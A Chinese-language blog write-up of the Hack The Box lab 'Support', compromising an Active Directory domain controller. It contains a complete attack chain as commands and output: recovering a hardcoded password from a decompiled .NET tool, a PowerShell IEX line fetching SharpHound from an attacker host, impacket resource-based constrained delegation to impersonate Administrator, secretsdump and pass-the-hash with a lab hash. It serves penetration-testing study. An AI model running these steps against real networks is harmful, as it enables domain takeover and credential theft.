主机发现
export ip=10.129.230.181
端口扫描
nmap --min-rate 10000 -p- -Pn $ip
PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 5985/tcp open wsman 9389/tcp open adws 49664/tcp open unknown 49667/tcp open unknown 49678/tcp open unknown 49683/tcp open unknown 49706/tcp open unknown 49744/tcp open unknown
从其中开启的完整域服务可以看出这是一台AD域控(DC)
服务扫描
nmap -sT -sV -sC -O -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49678,49683,49706,49744 $ip
PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-04-06 05:57:42Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49678/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49683/tcp open msrpc Microsoft Windows RPC 49706/tcp open msrpc Microsoft Windows RPC 49744/tcp open msrpc Microsoft Windows RPC Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2022 (87%) OS CPE: cpe:/o:microsoft:windows_server_2022 Aggressive OS guesses: Microsoft Windows Server 2022 (87%) No exact OS matches for host (test conditions non-ideal). Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2026-04-06T05:58:58 |_ start_date: N/A | smb2-security-mode: | 3.1.1: |_ Message signing enabled and required |_clock-skew: 1s OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 159.05 seconds
服务渗透
(一)SMB 445 枚举
crackmapexec smb 10.129.230.181 -u '' -p '' --shares
┌──(root㉿kali)-[/home/kali/bc/windows/support] └─# crackmapexec smb 10.129.230.181 -u '' -p '' --shares SMB 10.129.230.181 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB 10.129.230.181 445 DC [+] support.htb\: SMB 10.129.230.181 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
smbclient -L //10.129.230.181/ -N
-
-N(No Pass): 尝试 Null Session(空会话),如果服务器允许匿名访问此目录的话不需要任何用户密码就能看到内部文件
┌──(root㉿kali)-[/home/kali/bc/windows/support] └─# smbclient -L //10.129.230.181/ -N Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share support-tools Disk support staff tools SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.129.230.181 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available
可以看到有一个support-tools目录,尝试访问
smbclient //10.129.230.181/support-tools -N
可以发现出现了
smb: >
ls 查看目录
找到自定义工具
UserInfo.exe.zip
下载下来
get UserInfo.exe.zip
或者直接使用命令
smbmap -u guest -H 10.129.230.181 -r support-tools -A UserInfo.exe.zip -download
解压
uzip UserInfo.exe.zip
查看文件
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
该文件是利用 .net 编写的
我们可以对其进行反编译
利用dnSpy工具
using System; using System.Text; namespace UserInfo.Services { // Token: 0x02000006 RID: 6 internal class Protected { // Token: 0x0600000F RID: 15 RVA: 0x00002118 File Offset: 0x00000318 public static string getPassword() { byte[] array = Convert.FromBase64String(Protected.enc_password); byte[] array2 = array; for (int i = 0; i < array.Length; i++) { array2[i] = (array[i] ^ Protected.key[i % Protected.key.Length] ^ 223); } return Encoding.Default.GetString(array2); } // Token: 0x04000005 RID: 5 private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E"; // Token: 0x04000006 RID: 6 private static byte[] key = Encoding.ASCII.GetBytes("armando"); } }
发现了原始密码和加密方法
利用Python解密
import base64 array = base64.b64decode("0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E") key=b"armando" array2='' for i in range(len(array)): array2+=chr(array[i] ^ key[i % len(key)]^223) print(array2)
得到密码
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
(二)LDAP 389
先映射ip
echo "10.129.230.181 support.htb dc.support.htb" | sudo tee -a /etc/hosts
然后尝试匿名登录
ldapsearch -x -H ldap://support.htb -s base namingContexts
┌──(root㉿kali)-[/home/kali/bc/windows/support] └─# ldapsearch -x -H ldap://support.htb -s base namingContexts # extended LDIF # # LDAPv3 # base <> (default) with scope baseObject # filter: (objectclass=*) # requesting: namingContexts # # dn: namingContexts: DC=support,DC=htb namingContexts: CN=Configuration,DC=support,DC=htb namingContexts: CN=Schema,CN=Configuration,DC=support,DC=htb namingContexts: DC=DomainDnsZones,DC=support,DC=htb namingContexts: DC=ForestDnsZones,DC=support,DC=htb # search result search: 2 result: 0 Success # numResponses: 2 # numEntries: 1
发现匿名绑定是开启的,DC=support,DC=htb
查询
ldapsearch -x -H ldap://support.htb -b "DC=support,DC=htb"
┌──(root㉿kali)-[/home/kali/bc/windows/support] └─# ldapsearch -x -H ldap://support.htb -b "DC=support,DC=htb" # extended LDIF # # LDAPv3 # base <DC=support,DC=htb> with scope subtree # filter: (objectclass=*) # requesting: ALL # # search result search: 2 result: 1 Operations error text: 000004DC: LdapErr: DSID-0C090A5A, comment: In order to perform this opera tion a successful bind must be completed on the connection., data 0, v4f7c # numResponses: 1
需要认证
我们可以尝试一个刚刚的密码属于哪个用户
crackmapexec smb 10.129.230.181 -u 'ldap' 'support' 'armando' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
用户名 ldap
密码 nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
尝试利用此凭证连接WinRM服务,失败了
利用这个凭证进行域内枚举
ldapsearch -x -H ldap://support.htb -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" > ldap.txt
然后在结果中继续找
检测description字段
grep -i "description" ldap.txt
寻找其他服务账号
grep "sAMAccountName" ldap.txt
检测info字段
grep -i "info" ldap.txt
然后发现 存在 support 账号,此账号肯定主要关注,毕竟与靶机同名
收集一下support账号信息属性
ldapsearch -x -H ldap://support.htb -D "ldap@support.htb" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "DC=support,DC=htb" "(sAMAccountName=support)" > ldap_support.txt
发现info字段
info: Ironside47pleasure40Watchful
很像密码
尝试登录
初始权限
ldapsearch -x -H ldap://support.htb -D "support@support.htb" -w 'Ironside47pleasure40Watchful' -b "DC=support,DC=htb" -s base
evil-winrm -u support -p 'Ironside47pleasure40Watchful' -i support.htb
成功登录
获取User Flag
横向拿DC
我们借助Bloodhound工具
-
Kali中找到SharpHound.ps1
cp /usr/share/metasploit-framework/data/post/powershell/SharpHound.ps1 ./
-
目标机内存加载
IEX (New-Object System.Net.WebClient).DownloadString('http://10.10.16.253:8081/SharpHound.ps1')
然后检查一下是否加载成功
*Evil-WinRM* PS C:\Users\support\AppData\Local\Temp> Get-Command Invoke-BloodHound CommandType Name Version Source ----------- ---- ------- ------ Function Invoke-BloodHound
Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\support\AppData\Local\Temp
-
下载结果(因为使用Evil-WinRM连接的直接使用内置命令download下载了,不是powershell的命令)
download 20260406002644_BloodHound.zip /home/kali/bc/windows/support/support_bloodhound.zip
-
启动BloodHound可视化界面
启动 Neo4j 数据库
sudo neo4j console
登录,默认地址是http://localhost:7474,默认账号密码neo4j/neo4j
登录之后会强制要求修改密码
然后可以在 /etc/bhapi/bhapi.json 将修改后的密码重新写入bloodhound的配置文件中
然后输入
bloodhound
登录默认账号密码 admin/admin
上传文件后就可以对域环境进行分析了
Bloodhound 数据将显示支持用户对 DC.SUPPORT.HTB 对象拥有什么权限?
PATHFINDING查询起点 SUPPORT.HTB 终点 DC.SUPPORT.HTB
查看当前用户与DC域控的关系
A common attack with generic all on a computer object is to add a fake computer to the domain. What attribute on the domain sets how many computer accounts a user is allowed to create in the domain? 一种常见的利用通用权限攻击计算机对象的方法是向域中添加一台伪造的计算机。域中的哪个属性决定了用户可以在域中创建多少个计算机帐户?
关键属性:ms-DS-MachineAccountQuota
*Evil-WinRM* PS C:\Users\support\Documents> ([adsi]"LDAP://DC=support,DC=htb")."ms-DS-MachineAccountQuota" 10
表示我们在域中最多创建10个新机器用户权限,并且我们还拥有 GenericALL 权限
那我们就可以基于资源的约束委派打通DC
-
Kali中创建新用户
impacket-addcomputer 'support.htb/support:Ironside47pleasure40Watchful' -dc-ip 10.129.230.181 -computer-name 'EVIL-PC$' -computer-pass 'Password123'
-
配置RBCD委派
impacket-rbcd -delegate-from 'EVIL-PC$' -delegate-to 'DC$' -action 'write' -dc-ip 10.129.230.181 'support.htb/support:Ironside47pleasure40Watchful'
向DC表明:“DC 信任 EVIL-PC$,允许它代表域内的任何人(包括 Administrator)来访问 DC”
-
拿到管理员的服务票据
impacket-getST -dc-ip 10.129.230.181 -spn 'cifs/dc.support.htb' -impersonate 'Administrator' 'support.htb/EVIL-PC$:Password123'
-
导出域控Hash
先设置环境变量,因为后面脚本参数需要
export KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache
然后执行脚本
impacket-secretsdump -k -no-pass -dc-ip 10.129.230.181 'dc.support.htb'
-
登录
evil-winrm -i 10.129.230.181 -u Administrator -H bb06cbc02b39abeddd1335bc30b19e26
然后直接
cd C:\Users\Administrator\Desktop
查看root.txt即可
非特殊说明,本博所有文章均为博主原创。
如若转载,请注明出处:https://www.oneblanks.xyz/htb-support/
共有 0 条评论